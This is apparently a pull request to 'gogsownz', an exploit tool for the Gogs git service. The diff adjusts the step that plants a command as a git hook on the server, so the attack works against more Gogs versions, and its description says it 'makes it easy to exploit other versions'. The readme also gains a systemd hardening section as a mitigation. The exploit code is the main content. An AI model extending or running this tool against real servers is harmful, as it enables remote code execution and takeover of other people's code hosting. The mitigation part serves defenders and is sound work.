### PR TITLE
Add simple define for version compatibility

### DIFF
--- a/gogsownz.py
+++ b/gogsownz.py
@@ -13,14 +13,24 @@ Within Gogs there are 2 rules:
 Until those 2 rule will hold true, Gogsownz will stay alive.
 """
 
-EXTRA_COOKIES = ['_csrf', 'lang']
+# Some versions have `macaron_flash` in some responses
+EXTRA_COOKIES = ['_csrf', 'lang', 'macaron_flash']
 
 headers = {
     'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0'
 }
 
+if True:
+    # For some versions
+    HOOK_UPDATE_ENDPOINT = 'update'
+else:
+    # Other require this or they'll throw a 404
+    HOOK_UPDATE_ENDPOINT = 'pre-receive'
+
+
 class GogsException(Exception):
     pass
+
 
 class Gogs:
     def __init__(self, baseurl, proxy=None, verbosity=0, insecure=False, checktor=False, cookiename=None, windows=False):
@@ -283,7 +293,10 @@ class Gogs:
             'content': command
         }
         self.log(1, "Setting Git hooks")
-        resp = self.post('/{}/{}/settings/hooks/git/update'.format(self.username, repo_name), payload)
+
+        resp = self.post('/{}/{}/settings/hooks/git/{}'.format(
+            self.username, repo_name), payload, HOOK_UPDATE_ENDPOINT)
+
         if self.username not in resp:
             raise GogsException("Can't set Git hooks")
         self.log(1, "Git hooks set sucessfully")

--- a/gogsownz.py
+++ b/gogsownz.py
@@ -295,7 +295,7 @@ class Gogs:
         self.log(1, "Setting Git hooks")
 
         resp = self.post('/{}/{}/settings/hooks/git/{}'.format(
-            self.username, repo_name), payload, HOOK_UPDATE_ENDPOINT)
+            self.username, repo_name, HOOK_UPDATE_ENDPOINT), payload)
 
         if self.username not in resp:
             raise GogsException("Can't set Git hooks")

--- a/readme.md
+++ b/readme.md
@@ -83,3 +83,35 @@ https://github.com/gogs/gogs/issues/5558
 https://github.com/gogs/gogs/commit/8c8c37a66b4cef6fc8a995ab1b4fd6e530c49c51  
 https://github.com/gogs/gogs/issues/5599  
 https://2018.zeronights.ru/wp-content/uploads/materials/17-Who-owned-your-code.pdf
+
+### Mitigations
+
+If you take care in setting up your systemd unit file, you'll be pleasantly surprised to see that exploitation is somewhat contained:
+
+```
+[Unit]
+Description=Gogs
+After=syslog.target
+After=network.target
+
+[Service]
+Type=simple
+User=gogs
+Group=gogs
+WorkingDirectory=/home/gogs/installations/gogs/
+ExecStart=/home/gogs/installations/gogs/gogs web
+Restart=always
+Environment=USER=gogs HOME=/home/gogs
+
+# Some distributions may not support these hardening directives. If you cannot start the service due
+# to an unknown option, comment out the ones not supported by your version of systemd.
+ProtectSystem=full
+PrivateDevices=yes
+PrivateTmp=yes
+NoNewPrivileges=true
+
+[Install]
+WantedBy=multi-user.target
+```
+
+This will at least keep filesystem access contained to an ephemeral filesystem created by systemd. It helps, but you should probably patch the privesc and not give any admin.. obviously


### PR DESCRIPTION
This makes it easy to exploit other versions, which have a different name for the git hook update